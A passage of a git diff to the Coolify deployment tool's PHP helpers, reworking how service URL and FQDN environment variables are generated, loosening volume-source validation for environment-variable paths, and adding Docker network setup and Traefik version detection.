$sourceStr); + $isEnvVarWithPath = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}[\/\w\.\-]*$/', $sourceStr); - if (! $isSimpleEnvVar) { + if (! $isSimpleEnvVar && ! $isEnvVarWithPath) { try { validateShellSafePath($sourceStr, 'volume source'); } catch (\Exception $e) { @@ -453,13 +457,9 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int // for example SERVICE_FQDN_APP_3000 (without a value) if ($key->startsWith('SERVICE_FQDN_')) { // SERVICE_FQDN_APP or SERVICE_FQDN_APP_3000 - if (substr_count(str($key)->value(), '_') === 3) { - $fqdnFor = $key->after('SERVICE_FQDN_')->beforeLast('_')->lower()->value(); - $port = $key->afterLast('_')->value(); - } else { - $fqdnFor = $key->after('SERVICE_FQDN_')->lower()->value(); - $port = null; - } + $parsed = parseServiceEnvironmentVariable($key->value()); + $fqdnFor = $parsed['service_name']; + $port = $parsed['port']; $fqdn = $resource->fqdn; if (blank($resource->fqdn)) { $fqdn = generateFqdn(server: $server, random: "$uuid", parserVersion: $resource->compose_parsing_version); @@ -482,7 +482,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int $resource->save(); } - if (substr_count(str($key)->value(), '_') === 2) { + if (! $parsed['has_port']) { $resource->environment_variables()->updateOrCreate([ 'key' => $key->value(), 'resourceable_type' => get_class($resource), @@ -492,7 +492,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int 'is_preview' => false, ]); } - if (substr_count(str($key)->value(), '_') === 3) { + if ($parsed['has_port']) { $newKey = str($key)->beforeLast('_'); $resource->environment_variables()->updateOrCreate([ @@ -514,75 +514,96 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int $key = str($key); $value = replaceVariables($value); $command = parseCommandFromMagicEnvVariable($key); - if ($command->value() === 'FQDN') { - $fqdnFor = $key->after('SERVICE_FQDN_')->lower()->value(); - $originalFqdnFor = str($fqdnFor)->replace('_', '-'); - if (str($fqdnFor)->contains('-')) { - $fqdnFor = str($fqdnFor)->replace('-', '_')->replace('.', '_'); + if ($command->value() === 'FQDN' || $command->value() === 'URL') { + // ALWAYS create BOTH SERVICE_URL and SERVICE_FQDN pairs regardless of which one is in template + $parsed = parseServiceEnvironmentVariable($key->value()); + $serviceName = $parsed['service_name']; + $port = $parsed['port']; + + // Extract case-preserved service name from template + $strKey = str($key->value()); + if ($parsed['has_port']) { + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceNamePreserved = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } else { + $serviceNamePreserved = $strKey->after('SERVICE_FQDN_')->beforeLast('_')->value(); + } + } else { + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceNamePreserved = $strKey->after('SERVICE_URL_')->value(); + } else { + $serviceNamePreserved = $strKey->after('SERVICE_FQDN_')->value(); + } } - // Generated FQDN & URL - $fqdn = generateFqdn(server: $server, random: "$originalFqdnFor-$uuid", parserVersion: $resource->compose_parsing_version); - $url = generateUrl(server: $server, random: "$originalFqdnFor-$uuid"); + + $originalServiceName = str($serviceName)->replace('_', '-')->value(); + // Always normalize service names to match docker_compose_domains lookup + $serviceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); + + // Generate BOTH FQDN & URL + $fqdn = generateFqdn(server: $server, random: "$originalServiceName-$uuid", parserVersion: $resource->compose_parsing_version); + $url = generateUrl(server: $server, random: "$originalServiceName-$uuid"); + + // IMPORTANT: SERVICE_FQDN env vars should NOT contain scheme (host only) + // But $fqdn variable itself may contain scheme (used for database domain field) + // Strip scheme for environment variable values + $fqdnValueForEnv = str($fqdn)->after('://')->value(); + + // Append port if specified + $urlWithPort = $url; + $fqdnValueForEnvWithPort = $fqdnValueForEnv; + if ($port && is_numeric($port)) { + $urlWithPort = "$url:$port"; + $fqdnValueForEnvWithPort = "$fqdnValueForEnv:$port"; + } + + // ALWAYS create base SERVICE_FQDN variable (host only, no scheme) $resource->environment_variables()->firstOrCreate([ - 'key' => $key->value(), + 'key' => "SERVICE_FQDN_{$serviceNamePreserved}", 'resourceable_type' => get_class($resource), 'resourceable_id' => $resource->id, ], [ - 'value' => $fqdn, + 'value' => $fqdnValueForEnv, 'is_preview' => false, ]); - if ($resource->build_pack === 'dockercompose') { - // Check if a service with this name actually exists - $serviceExists = false; - foreach ($services as $serviceName => $service) { - $transformedServiceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); - if ($transformedServiceName === $fqdnFor) { - $serviceExists = true; - break; - } - } - // Only add domain if the service exists - if ($serviceExists) { - $domains = collect(json_decode(data_get($resource, 'docker_compose_domains'))) ?? collect([]); - $domainExists = data_get($domains->get($fqdnFor), 'domain'); - $envExists = $resource->environment_variables()->where('key', $key->value())->first(); - if (str($domainExists)->replace('http://', '')->replace('https://', '')->value() !== $envExists->value) { - $envExists->update([ - 'value' => $url, - ]); - } - if (is_null($domainExists)) { - // Put URL in the domains array instead of FQDN - $domains->put((string) $fqdnFor, [ - 'domain' => $url, - ]); - $resource->docker_compose_domains = $domains->toJson(); - $resource->save(); - } - } - } - } elseif ($command->value() === 'URL') { - $urlFor = $key->after('SERVICE_URL_')->lower()->value(); - $originalUrlFor = str($urlFor)->replace('_', '-'); - if (str($urlFor)->contains('-')) { - $urlFor = str($urlFor)->replace('-', '_')->replace('.', '_'); - } - $url = generateUrl(server: $server, random: "$originalUrlFor-$uuid"); + // ALWAYS create base SERVICE_URL variable (with scheme) $resource->environment_variables()->firstOrCreate([ - 'key' => $key->value(), + 'key' => "SERVICE_URL_{$serviceNamePreserved}", 'resourceable_type' => get_class($resource), 'resourceable_id' => $resource->id, ], [ 'value' => $url, 'is_preview' => false, ]); + + // If port-specific, ALSO create port-specific pairs + if ($parsed['has_port'] && $port) { + $resource->environment_variables()->firstOrCreate([ + 'key' => "SERVICE_FQDN_{$serviceNamePreserved}_{$port}", + 'resourceable_type' => get_class($resource), + 'resourceable_id' => $resource->id, + ], [ + 'value' => $fqdnValueForEnvWithPort, + 'is_preview' => false, + ]); + + $resource->environment_variables()->firstOrCreate([ + 'key' => "SERVICE_URL_{$serviceNamePreserved}_{$port}", + 'resourceable_type' => get_class($resource), + 'resourceable_id' => $resource->id, + ], [ + 'value' => $urlWithPort, + 'is_preview' => false, + ]); + } + if ($resource->build_pack === 'dockercompose') { // Check if a service with this name actually exists $serviceExists = false; - foreach ($services as $serviceName => $service) { - $transformedServiceName = str($serviceName)->replace('-', '_')->replace('.', '_')->value(); - if ($transformedServiceName === $urlFor) { + foreach ($services as $serviceNameKey => $service) { + $transformedServiceName = str($serviceNameKey)->replace('-', '_')->replace('.', '_')->value(); + if ($transformedServiceName === $serviceName) { $serviceExists = true; break; } @@ -591,16 +612,14 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int // Only add domain if the service exists if ($serviceExists) { $domains = collect(json_decode(data_get($resource, 'docker_compose_domains'))) ?? collect([]); - $domainExists = data_get($domains->get($urlFor), 'domain'); - $envExists = $resource->environment_variables()->where('key', $key->value())->first(); - if ($domainExists !== $envExists->value) { - $envExists->update([ - 'value' => $url, - ]); - } + $domainExists = data_get($domains->get($serviceName), 'domain'); + + // Update domain using URL with port if applicable + $domainValue = $port ? $urlWithPort : $url; + if (is_null($domainExists)) { - $domains->put((string) $urlFor, [ - 'domain' => $url, + $domains->put($serviceName, [ + 'domain' => $domainValue, ]); $resource->docker_compose_domains = $domains->toJson(); $resource->save(); @@ -711,9 +730,12 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int // Validate source and target for command injection (array/long syntax) if ($source !== null && ! empty($source->value())) { $sourceValue = $source->value(); - // Allow simple environment variable references + // Allow environment variable references and env vars with path concatenation $isSimpleEnvVar = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}$/', $sourceValue); - if (! $isSimpleEnvVar) { + $isEnvVarWithDefault = preg_match('/^\$\{[^}]+:-[^}]*\}$/', $sourceValue); + $isEnvVarWithPath = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}[\/\w\.\-]*$/', $sourceValue); + + if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) { try { validateShellSafePath($sourceValue, 'volume source'); } catch (\Exception $e) { @@ -1293,6 +1315,15 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int if ($depends_on->count() > 0) { $payload['depends_on'] = $depends_on; } + // Auto-inject .env file so Coolify environment variables are available inside containers + // This makes Applications behave consistently with manual .env file usage + $existingEnvFiles = data_get($service, 'env_file'); + $envFiles = collect(is_null($existingEnvFiles) ? [] : (is_array($existingEnvFiles) ? $existingEnvFiles : [$existingEnvFiles])) + ->push('.env') + ->unique() + ->values(); + + $payload['env_file'] = $envFiles; if ($isPullRequest) { $serviceName = addPreviewDeploymentSuffix($serviceName, $pullRequestId); } @@ -1412,22 +1443,40 @@ function serviceParser(Service $resource): Collection } $image = data_get_str($service, 'image'); - $isDatabase = isDatabaseImage($image, $service); - if ($isDatabase) { - $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first(); - if ($applicationFound) { - $savedService = $applicationFound; + + // Check for manually migrated services first (respects user's conversion choice) + $migratedApp = ServiceApplication::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + $migratedDb = ServiceDatabase::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + + if ($migratedApp || $migratedDb) { + // Use the migrated service type, ignoring image detection + $isDatabase = (bool) $migratedDb; + $savedService = $migratedApp ?: $migratedDb; + } else { + // Use image detection for non-migrated services + $isDatabase = isDatabaseImage($image, $service); + if ($isDatabase) { + $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first(); + if ($applicationFound) { + $savedService = $applicationFound; + } else { + $savedService = ServiceDatabase::firstOrCreate([ + 'name' => $serviceName, + 'service_id' => $resource->id, + ]); + } } else { - $savedService = ServiceDatabase::firstOrCreate([ + $savedService = ServiceApplication::firstOrCreate([ 'name' => $serviceName, 'service_id' => $resource->id, ]); } - } else { - $savedService = ServiceApplication::firstOrCreate([ - 'name' => $serviceName, - 'service_id' => $resource->id, - ]); } // Update image if it changed if ($savedService->image !== $image) { @@ -1442,7 +1491,24 @@ function serviceParser(Service $resource): Collection $environment = collect(data_get($service, 'environment', [])); $buildArgs = collect(data_get($service, 'build.args', [])); $environment = $environment->merge($buildArgs); - $isDatabase = isDatabaseImage($image, $service); + + // Check for manually migrated services first (respects user's conversion choice) + $migratedApp = ServiceApplication::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + $migratedDb = ServiceDatabase::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + + if ($migratedApp || $migratedDb) { + // Use the migrated service type, ignoring image detection + $isDatabase = (bool) $migratedDb; + } else { + // Use image detection for non-migrated services + $isDatabase = isDatabaseImage($image, $service); + } $containerName = "$serviceName-{$resource->uuid}"; @@ -1462,7 +1528,11 @@ function serviceParser(Service $resource): Collection if ($serviceName === 'plausible') { $predefinedPort = '8000'; } - if ($isDatabase) { + + if ($migratedApp || $migratedDb) { + // Use the already determined migrated service + $savedService = $migratedApp ?: $migratedDb; + } elseif ($isDatabase) { $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first(); if ($applicationFound) { $savedService = $applicationFound; @@ -1524,103 +1594,122 @@ function serviceParser(Service $resource): Collection } // Get magic environments where we need to preset the FQDN / URL if ($key->startsWith('SERVICE_FQDN_') || $key->startsWith('SERVICE_URL_')) { - // SERVICE_FQDN_APP or SERVICE_FQDN_APP_3000 - if (substr_count(str($key)->value(), '_') === 3) { - if ($key->startsWith('SERVICE_FQDN_')) { - $urlFor = null; - $fqdnFor = $key->after('SERVICE_FQDN_')->beforeLast('_')->lower()->value(); + // SERVICE_FQDN_APP or SERVICE_FQDN_APP_3000 or SERVICE_URL_APP or SERVICE_URL_APP_3000 + // ALWAYS create BOTH SERVICE_URL and SERVICE_FQDN pairs regardless of which one is in template + $parsed = parseServiceEnvironmentVariable($key->value()); + + // Extract service name preserving original case from template + $strKey = str($key->value()); + if ($parsed['has_port']) { + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->beforeLast('_')->value(); + } else { + continue; } - if ($key->startsWith('SERVICE_URL_')) { - $fqdnFor = null; - $urlFor = $key->after('SERVICE_URL_')->beforeLast('_')->lower()->value(); - } - $port = $key->afterLast('_')->value(); } else { - if ($key->startsWith('SERVICE_FQDN_')) { - $urlFor = null; - $fqdnFor = $key->after('SERVICE_FQDN_')->lower()->value(); + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->value(); + } else { + continue; } - if ($key->startsWith('SERVICE_URL_')) { - $fqdnFor = null; - $urlFor = $key->after('SERVICE_URL_')->lower()->value(); - } - $port = null; } - if (blank($savedService->fqdn)) { - if ($fqdnFor) { - $fqdn = generateFqdn(server: $server, random: "$fqdnFor-$uuid", parserVersion: $resource->compose_parsing_version); - } else { - $fqdn = generateFqdn(server: $server, random: "{$savedService->name}-$uuid", parserVersion: $resource->compose_parsing_version); - } - if ($urlFor) { - $url = generateUrl($server, "$urlFor-$uuid"); - } else { - $url = generateUrl($server, "{$savedService->name}-$uuid"); - } - } else { + + $port = $parsed['port']; + $fqdnFor = $parsed['service_name']; + + // Only ServiceApplication has fqdn column, ServiceDatabase does not + $isServiceApplication = $savedService instanceof ServiceApplication; + + if ($isServiceApplication && blank($savedService->fqdn)) { + $fqdn = generateFqdn(server: $server, random: "$fqdnFor-$uuid", parserVersion: $resource->compose_parsing_version); + $url = generateUrl($server, "$fqdnFor-$uuid"); + } elseif ($isServiceApplication) { $fqdn = str($savedService->fqdn)->after('://')->before(':')->prepend(str($savedService->fqdn)->before('://')->append('://'))->value(); $url = str($savedService->fqdn)->after('://')->before(':')->prepend(str($savedService->fqdn)->before('://')->append('://'))->value(); + } else { + // For ServiceDatabase, generate fqdn/url without saving to the model + $fqdn = generateFqdn(server: $server, random: "$fqdnFor-$uuid", parserVersion: $resource->compose_parsing_version); + $url = generateUrl($server, "$fqdnFor-$uuid"); } + // IMPORTANT: SERVICE_FQDN env vars should NOT contain scheme (host only) + // But $fqdn variable itself may contain scheme (used for database domain field) + // Strip scheme for environment variable values + $fqdnValueForEnv = str($fqdn)->after('://')->value(); + if ($value && get_class($value) === \Illuminate\Support\Stringable::class && $value->startsWith('/')) { $path = $value->value(); if ($path !== '/') { - $fqdn = "$fqdn$path"; - $url = "$url$path"; + // Only add path if it's not already present (prevents duplication on subsequent parse() calls) + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + if (! str($url)->endsWith($path)) { + $url = "$url$path"; + } + if (! str($fqdnValueForEnv)->endsWith($path)) { + $fqdnValueForEnv = "$fqdnValueForEnv$path"; + } } } - $fqdnWithPort = $fqdn; + $urlWithPort = $url; + $fqdnValueForEnvWithPort = $fqdnValueForEnv; if ($fqdn && $port) { - $fqdnWithPort = "$fqdn:$port"; + $fqdnValueForEnvWithPort = "$fqdnValueForEnv:$port"; } if ($url && $port) { $urlWithPort = "$url:$port"; } - if (is_null($savedService->fqdn)) { + + // Only save fqdn to ServiceApplication, not ServiceDatabase + if ($isServiceApplication && is_null($savedService->fqdn)) { + // Save URL (with scheme) to database, not FQDN if ((int) $resource->compose_parsing_version >= 5 && version_compare(config('constants.coolify.version'), '4.0.0-beta.420.7', '>=')) { - if ($fqdnFor) { - $savedService->fqdn = $fqdnWithPort; - } - if ($urlFor) { - $savedService->fqdn = $urlWithPort; - } + $savedService->fqdn = $urlWithPort; } else { - $savedService->fqdn = $fqdnWithPort; + $savedService->fqdn = $urlWithPort; } $savedService->save(); } - if (substr_count(str($key)->value(), '_') === 2) { + + // ALWAYS create BOTH base SERVICE_URL and SERVICE_FQDN pairs (without port) + $resource->environment_variables()->updateOrCreate([ + 'key' => "SERVICE_FQDN_{$serviceName}", + 'resourceable_type' => get_class($resource), + 'resourceable_id' => $resource->id, + ], [ + 'value' => $fqdnValueForEnv, + 'is_preview' => false, + ]); + + $resource->environment_variables()->updateOrCreate([ + 'key' => "SERVICE_URL_{$serviceName}", + 'resourceable_type' => get_class($resource), + 'resourceable_id' => $resource->id, + ], [ + 'value' => $url, + 'is_preview' => false, + ]); + + // For port-specific variables, ALSO create port-specific pairs + // If template variable has port, create both URL and FQDN with port suffix + if ($parsed['has_port'] && $port) { $resource->environment_variables()->updateOrCreate([ - 'key' => $key->value(), + 'key' => "SERVICE_FQDN_{$serviceName}_{$port}", 'resourceable_type' => get_class($resource), 'resourceable_id' => $resource->id, ], [ - 'value' => $fqdn, + 'value' => $fqdnValueForEnvWithPort, 'is_preview' => false, ]); + $resource->environment_variables()->updateOrCreate([ - 'key' => $key->value(), - 'resourceable_type' => get_class($resource), - 'resourceable_id' => $resource->id, - ], [ - 'value' => $url, - 'is_preview' => false, - ]); - } - if (substr_count(str($key)->value(), '_') === 3) { - // For port-specific variables (e.g., SERVICE_FQDN_UMAMI_3000), - // keep the port suffix in the key and use the URL with port - $resource->environment_variables()->updateOrCreate([ - 'key' => $key->value(), - 'resourceable_type' => get_class($resource), - 'resourceable_id' => $resource->id, - ], [ - 'value' => $fqdnWithPort, - 'is_preview' => false, - ]); - $resource->environment_variables()->updateOrCreate([ - 'key' => $key->value(), + 'key' => "SERVICE_URL_{$serviceName}_{$port}", 'resourceable_type' => get_class($resource), 'resourceable_id' => $resource->id, ], [ @@ -1642,8 +1731,17 @@ function serviceParser(Service $resource): Collection $url = generateUrl(server: $server, random: str($fqdnFor)->replace('_', '-')->value()."-$uuid"); $envExists = $resource->environment_variables()->where('key', $key->value())->first(); + // Also check if a port-suffixed version exists (e.g., SERVICE_FQDN_UMAMI_3000) + $portSuffixedExists = $resource->environment_variables() + ->where('key', 'LIKE', $key->value().'_%') + ->whereRaw('key ~ ?', ['^'.$key->value().'_[0-9]+$']) + ->exists(); $serviceExists = ServiceApplication::where('name', str($fqdnFor)->replace('_', '-')->value())->where('service_id', $resource->id)->first(); - if (! $envExists && (data_get($serviceExists, 'name') === str($fqdnFor)->replace('_', '-')->value())) { + // Check if FQDN already has a port set (contains ':' after the domain) + $fqdnHasPort = $serviceExists && str($serviceExists->fqdn)->contains(':') && str($serviceExists->fqdn)->afterLast(':')->isMatch('/^\d+$/'); + // Only set FQDN if it's for the current service being processed (prevent race conditions) + $isCurrentService = $serviceExists && $serviceExists->id === $savedService->id; + if (! $envExists && ! $portSuffixedExists && ! $fqdnHasPort && $isCurrentService && (data_get($serviceExists, 'name') === str($fqdnFor)->replace('_', '-')->value())) { // Save URL otherwise it won't work. $serviceExists->fqdn = $url; $serviceExists->save(); @@ -1662,8 +1760,17 @@ function serviceParser(Service $resource): Collection $url = generateUrl(server: $server, random: str($urlFor)->replace('_', '-')->value()."-$uuid"); $envExists = $resource->environment_variables()->where('key', $key->value())->first(); + // Also check if a port-suffixed version exists (e.g., SERVICE_URL_DASHBOARD_6791) + $portSuffixedExists = $resource->environment_variables() + ->where('key', 'LIKE', $key->value().'_%') + ->whereRaw('key ~ ?', ['^'.$key->value().'_[0-9]+$']) + ->exists(); $serviceExists = ServiceApplication::where('name', str($urlFor)->replace('_', '-')->value())->where('service_id', $resource->id)->first(); - if (! $envExists && (data_get($serviceExists, 'name') === str($urlFor)->replace('_', '-')->value())) { + // Check if FQDN already has a port set (contains ':' after the domain) + $fqdnHasPort = $serviceExists && str($serviceExists->fqdn)->contains(':') && str($serviceExists->fqdn)->afterLast(':')->isMatch('/^\d+$/'); + // Only set FQDN if it's for the current service being processed (prevent race conditions) + $isCurrentService = $serviceExists && $serviceExists->id === $savedService->id; + if (! $envExists && ! $portSuffixedExists && ! $fqdnHasPort && $isCurrentService && (data_get($serviceExists, 'name') === str($urlFor)->replace('_', '-')->value())) { $serviceExists->fqdn = $url; $serviceExists->save(); } @@ -1728,7 +1835,25 @@ function serviceParser(Service $resource): Collection $environment = convertToKeyValueCollection($environment); $coolifyEnvironments = collect([]); - $isDatabase = isDatabaseImage($image, $service); + // Check for manually migrated services first (respects user's conversion choice) + $migratedApp = ServiceApplication::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + $migratedDb = ServiceDatabase::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + + if ($migratedApp || $migratedDb) { + // Use the migrated service type, ignoring image detection + $isDatabase = (bool) $migratedDb; + $savedService = $migratedApp ?: $migratedDb; + } else { + // Use image detection for non-migrated services + $isDatabase = isDatabaseImage($image, $service); + } + $volumesParsed = collect([]); $containerName = "$serviceName-{$resource->uuid}"; @@ -1750,7 +1875,10 @@ function serviceParser(Service $resource): Collection $predefinedPort = '8000'; } - if ($isDatabase) { + if ($migratedApp || $migratedDb) { + // Use the already determined migrated service + $savedService = $migratedApp ?: $migratedDb; + } elseif ($isDatabase) { $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first(); if ($applicationFound) { $savedService = $applicationFound; @@ -1812,9 +1940,12 @@ function serviceParser(Service $resource): Collection // Validate source and target for command injection (array/long syntax) if ($source !== null && ! empty($source->value())) { $sourceValue = $source->value(); - // Allow simple environment variable references + // Allow environment variable references and env vars with path concatenation $isSimpleEnvVar = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}$/', $sourceValue); - if (! $isSimpleEnvVar) { + $isEnvVarWithDefault = preg_match('/^\$\{[^}]+:-[^}]*\}$/', $sourceValue); + $isEnvVarWithPath = preg_match('/^\$\{[a-zA-Z_][a-zA-Z0-9_]*\}[\/\w\.\-]*$/', $sourceValue); + + if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) { try { validateShellSafePath($sourceValue, 'volume source'); } catch (\Exception $e) { @@ -2269,6 +2400,15 @@ function serviceParser(Service $resource): Collection if ($depends_on->count() > 0) { $payload['depends_on'] = $depends_on; } + // Auto-inject .env file so Coolify environment variables are available inside containers + // This makes Services behave consistently with Applications + $existingEnvFiles = data_get($service, 'env_file'); + $envFiles = collect(is_null($existingEnvFiles) ? [] : (is_array($existingEnvFiles) ? $existingEnvFiles : [$existingEnvFiles])) + ->push('.env') + ->unique() + ->values(); + + $payload['env_file'] = $envFiles; $parsedServices->put($serviceName, $payload); } diff --git a/bootstrap/helpers/proxy.php b/bootstrap/helpers/proxy.php index 924bad307..6672f8b6f 100644 --- a/bootstrap/helpers/proxy.php +++ b/bootstrap/helpers/proxy.php @@ -108,6 +108,37 @@ function connectProxyToNetworks(Server $server) return $commands->flatten(); } + +/** + * Ensures all required networks exist before docker compose up. + * This must be called BEFORE docker compose up since the compose file declares networks as external. + * + * @param Server $server The server to ensure networks on + * @return \Illuminate\Support\Collection Commands to create networks if they don't exist + */ +function ensureProxyNetworksExist(Server $server) +{ + ['allNetworks' => $networks] = collectDockerNetworksByServer($server); + + if ($server->isSwarm()) { + $commands = $networks->map(function ($network) { + return [ + "echo 'Ensuring network $network exists...'", + "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --driver overlay --attachable $network", + ]; + }); + } else { + $commands = $networks->map(function ($network) { + return [ + "echo 'Ensuring network $network exists...'", + "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --attachable $network", + ]; + }); + } + + return $commands->flatten(); +} + function extractCustomProxyCommands(Server $server, string $existing_config): array { $custom_commands = []; @@ -212,7 +243,7 @@ function generateDefaultProxyConfiguration(Server $server, array $custom_command 'services' => [ 'traefik' => [ 'container_name' => 'coolify-proxy', - 'image' => 'traefik:v3.1', + 'image' => 'traefik:v3.6', 'restart' => RESTART_MODE, 'extra_hosts' => [ 'host.docker.internal:host-gateway', @@ -334,3 +365,93 @@ function generateDefaultProxyConfiguration(Server $server, array $custom_command return $config; } + +function getExactTraefikVersionFromContainer(Server $server): ?string +{ + try { + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Checking for exact version"); + + // Method A: Execute traefik version command (most reliable) + $versionCommand = "docker exec coolify-proxy traefik version 2>/dev/null | grep -oP 'Version:\s+\K\d+\.\d+\.\d+'"; + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Running: {$versionCommand}"); + + $output = instant_remote_process([$versionCommand], $server, false); + + if (! empty(trim($output))) { + $version = trim($output); + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Detected exact version from command: {$version}"); + + return $version; + } + + // Method B: Try OCI label as fallback + $labelCommand = "docker inspect coolify-proxy --format '{{index .Config.Labels \"org.opencontainers.image.version\"}}' 2>/dev/null"; + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Trying OCI label"); + + $label = instant_remote_process([$labelCommand], $server, false); + + if (! empty(trim($label))) { + // Extract version number from label (might have 'v' prefix) + if (preg_match('/(\d+\.\d+\.\d+)/', trim($label), $matches)) { + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Detected from OCI label: {$matches[1]}"); + + return $matches[1]; + } + } + + Log::debug("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Could not detect exact version"); + + return null; + } catch (\Exception $e) { + Log::error("getExactTraefikVersionFromContainer: Server '{$server->name}' (ID: {$server->id}) - Error: ".$e->getMessage()); + + return null; + } +} + +function getTraefikVersionFromDockerCompose(Server $server): ?string +{ + try { + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Starting version detection"); + + // Try to get exact version from running container (e.g., "3.6.0") + $exactVersion = getExactTraefikVersionFromContainer($server); + if ($exactVersion) { + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Using exact version: {$exactVersion}"); + + return $exactVersion; + } + + // Fallback: Check image tag (current method) + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Falling back to image tag detection"); + + $containerName = 'coolify-proxy'; + $inspectCommand = "docker inspect {$containerName} --format '{{.Config.Image}}' 2>/dev/null"; + + $image = instant_remote_process([$inspectCommand], $server, false); + + if (empty(trim($image))) { + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Container '{$containerName}' not found or not running"); + + return null; + } + + $image = trim($image); + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Running container image: {$image}"); + + // Extract version from image string (e.g., "traefik:v3.6" or "traefik:3.6.0" or "traefik:latest") + if (preg_match('/traefik:(v?\d+\.\d+(?:\.\d+)?|latest)/i', $image, $matches)) { + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Extracted version from image tag: {$matches[1]}"); + + return $matches[1]; + } + + Log::debug("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Image format doesn't match expected pattern: {$image}"); + + return null; + } catch (\Exception $e) { + Log::error("getTraefikVersionFromDockerCompose: Server '{$server->name}' (ID: {$server->id}) - Error: ".$e->getMessage()); + + return null; + } +} diff --git a/bootstrap/helpers/services.php b/bootstrap/helpers/services.php index a124272a2..3fff2c090 100644 --- a/bootstrap/helpers/services.php +++ b/bootstrap/helpers/services.php @@ -115,65 +115,170 @@ function updateCompose(ServiceApplication|ServiceDatabase $resource) $resource->save(); } - $serviceName = str($resource->name)->upper()->replace('-', '_')->replace('.', '_'); - $resource->service->environment_variables()->where('key', 'LIKE', "SERVICE_FQDN_{$serviceName}%")->delete(); - $resource->service->environment_variables()->where('key', 'LIKE', "SERVICE_URL_{$serviceName}%")->delete(); + // Extract SERVICE_URL and SERVICE_FQDN variable names from the compose template + // to ensure we use the exact names defined in the template (which may be abbreviated) + // IMPORTANT: Only extract variables that are DIRECTLY DECLARED for this service, + // not variables that are merely referenced from other services + $serviceConfig = data_get($dockerCompose, "services.{$name}"); + $environment = data_get($serviceConfig, 'environment', []); + $templateVariableNames = []; + + foreach ($environment as $key => $value) { + if (is_int($key) && is_string($value)) { + // List-style: "- SERVICE_URL_APP_3000" or "- SERVICE_URL_APP_3000=value" + // Extract variable name (before '=' if present) + $envVarName = str($value)->before('=')->trim(); + // Only include if it's a direct declaration (not a reference like ${VAR}) + // Direct declarations look like: SERVICE_URL_APP or SERVICE_URL_APP_3000 + // References look like: NEXT_PUBLIC_URL=${SERVICE_URL_APP} + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } elseif (is_string($key)) { + // Map-style: "SERVICE_URL_APP_3000: value" or "SERVICE_FQDN_DB: localhost" + $envVarName = str($key); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + // DO NOT extract variables that are only referenced with ${VAR_NAME} syntax + // Those belong to other services and will be updated when THOSE services are updated + } + + // Remove duplicates + $templateVariableNames = array_unique($templateVariableNames); + + // Extract unique service names to process (preserving the original case from template) + // This allows us to create both URL and FQDN pairs regardless of which one is in the template + $serviceNamesToProcess = []; + foreach ($templateVariableNames as $templateVarName) { + $parsed = parseServiceEnvironmentVariable($templateVarName); + + // Extract the original service name with case preserved from the template + $strKey = str($templateVarName); + if ($parsed['has_port']) { + // For port-specific variables, 